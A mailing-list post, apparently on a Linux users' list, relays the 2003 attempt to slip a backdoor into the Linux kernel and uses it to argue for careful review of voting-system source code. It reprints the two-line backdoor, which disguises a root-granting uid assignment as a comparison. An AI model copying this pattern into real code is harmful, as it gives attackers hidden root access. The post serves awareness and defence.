Although this is not Mandrake related, I feel its worth posting the link to
the story. This was posted in the Risks Digest:
On 5 Nov 2003, an attempt to insert a very cleverly crafted backdoor into
Linux was averted. This is a really good example of the subtle kinds of
hacks a source code examiner must be waiting to catch if we want genuinely
secure voting systems under the current model of proprietary DRE systems
with a closed-door source code examination.
Someone broke into a server at kernel.kbits.net and inserted the following
code into the Linux kernel:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
For the complete story of this attack on Linux, including the actual E-mail
exchange documenting the discovery of the attack, see:
http://kerneltrap.org/node/view/1584
Linux: Kernel "Back Door" Attempt
This attack has only made the mainstream media in one place, so far:
http://www.smh.com.au/articles/2003/11/07/1068013371170.html
Bid to backdoor Linux kernel detected - smh.com.au
--
Regards
Chris
A 100% Microsoft free computer
Registered Linux User 283774 http://counter.li.org
9:16pm up 4 days, 11:22, 3 users, load average: 0.08, 0.05, 0.01
Want to buy your Pack or Services from MandrakeSoft?
Go to http://www.mandrakestore.com